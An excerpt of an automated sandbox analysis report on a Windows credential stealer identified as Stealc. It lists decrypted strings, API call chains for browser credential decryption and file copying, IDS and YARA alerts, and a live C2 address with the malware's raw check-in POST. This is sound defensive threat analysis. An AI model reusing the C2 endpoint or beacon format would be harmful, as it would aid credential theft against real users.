                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: y
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: QC4Ig
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: HATKOngp
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: unyt"b
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: eSlot
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: M&_1Y,wI
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: r
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: #u
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: n@fc"
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: sxgmoal`hsv`xcb`}|{nj
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: $I!~z
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: v}~upa1Hy/Vo%l@Q?cschF2c)`uw
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: hnd1M/}b;8
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: jYJay|`tD
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ;r1d
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: kos"Q
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 3[?S]y
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: k`~~||uyxbpxq{xybvtqk`p}~e`vwbyfue}s|c
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: unx}plhkboahg`~cqzza~p{}elctco`xz
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: sxvbwfyaegmzw
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: `obd3HFzydB
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ty
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: qA6Jd#'w{]x:MVHHArlZ4}joS3:QFJ,
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: FM0jcc
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: Jvd4mOc)b^my0tPfnZuEd
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ];-1
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: WF8Hdp87
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: z|
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: `il}hgl`ye
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: A6HBG0UR
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 2ZIT0LFh10_t,?+0Q>!</
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: l>
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: a}{c
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 9S_1J
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: @W(C'2
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: v`qacizxw~{ii`|a|o`g
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: jyee{lqpz~}edlxjsavz
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: rTT9HB\PTnfp=h9^?
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ~jGknQCC+?bfYKUSK|65j{sW^,A8X-Pa{NP`
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: )xd@z?Xt/ICq9AeV,cc|PyFI7093|qK~:]kh
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: \N=d8m;!a]9hNI'$jbt0
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ko RUPEvcNz%`ky
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: qoj
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ygRDVg
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: son
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ?7QGv
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 3 z7
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: encryptedUsername
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: encryptedPassword
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: m
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: uaeeudsnuqku}
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: {b~je`ju{ac
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: `e
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: RY59+
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: }y~n} |Du>Du>F$UAnKWw9M}v>GrZXp"IYDhl?V
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 'm20 )a|hO+mcp,8gks?]
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: P
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: m`k
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: xx
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: `{
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: #}kw{[trGTqy`xrB3VD`|
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !`]axpqjz
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: @UOR
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ,$A^fiT(:)#
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: is`L9pB
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: l!!Hs
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: e9drlZheAbj9z}h
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: kuxxuhd
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: em Summary:
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: gtc0M3g!
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 2D -%
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: aG
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: UZ8+.&j60D
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: qoc]U
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: yl
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: tfT)
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ~QY
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: FQIV}g|rq
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: nS="V=
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: l|ho/Eq
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: JU6Bt"CL
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: T6YX
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: G{csgPDl
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: r
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: Q2WCCK43
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: T2YT
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ~S"tqrvgd*ij
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ksUV4u=DjAP
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 8vNs
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: kwQ8f@5{O{
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: yyviQPI
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: akns
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 9?7~"dS^=
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ]Rf(1J
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: open
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: D49,hUBY
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: pj{O
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ~{gtCv{dhxA
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ea#MMH6-
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: FILES%
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00419030 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00419030
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040C920 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C920
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0040A210
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_004072A0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004072A0
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040A2B0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_0040A2B0
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02469297 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_02469297
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245A477 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0245A477
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02457507 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_02457507
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245A517 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_0245A517
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245CB87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_0245CB87

                      Compliance

                      barindex
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeUnpacked PE file: 0.2.XJQkTVvJ3I.exe.400000.1.unpack
                      Source: XJQkTVvJ3I.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: Binary string: my_library.pdbU source: XJQkTVvJ3I.exe, 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                      Source: Binary string: my_library.pdb source: XJQkTVvJ3I.exe, XJQkTVvJ3I.exe, 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,LCMapStringW,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DF10
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02464357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_02464357
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245F087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0245F087
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245C0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0245C0A7
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245E177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0245E177
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245E797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0245E797
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245FA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0245FA17
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02464A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_02464A27
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02451977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02451977
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02463D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_02463D67
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02464DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02464DC7
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245DDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0245DDE7

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.235.128.16:80
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: http://185.235.128.16/562c1eb14955c897.php
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.235.128.16Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEGHost: 185.235.128.16Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 32 41 44 39 35 35 30 30 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 2d 2d 0d 0a Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="hwid"C12AD95500561166170430------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build"LogsDiller------HJJJDAEGIDHCBFHJJJEG--
                      Source: Joe Sandbox ViewASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49743
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49737
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_004048D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004048D0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.235.128.16Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEGHost: 185.235.128.16Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 32 41 44 39 35 35 30 30 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 2d 2d 0d 0a Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="hwid"C12AD95500561166170430------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build"LogsDiller------HJJJDAEGIDHCBFHJJJEG--
                      Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16
                      Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/
                      Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/562c1eb14955c897.php
                      Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/562c1eb14955c897.php4
                      Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/562c1eb14955c897.phpQ
                      Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/562c1eb14955c897.phpk
                      Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/562c1eb14955c897.phpx
                      Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/562c1eb14955c897.php~M
                      Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16/ws
                      Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.128.16e
                      Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
                      Source: XJQkTVvJ3I.exe, XJQkTVvJ3I.exe, 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00409E30 memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,0_2_00409E30

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 00000000.00000002.1929328076.0000000000840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024982DF0_2_024982DF
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024C134F0_2_024C134F
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024CA08F0_2_024CA08F
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024AB1CF0_2_024AB1CF
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024811DF0_2_024811DF
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024BA19F0_2_024BA19F
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024936EF0_2_024936EF
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024DA76F0_2_024DA76F
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0248F4FF0_2_0248F4FF
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024AA5FF0_2_024AA5FF
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0248159F0_2_0248159F
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024BCA0F0_2_024BCA0F
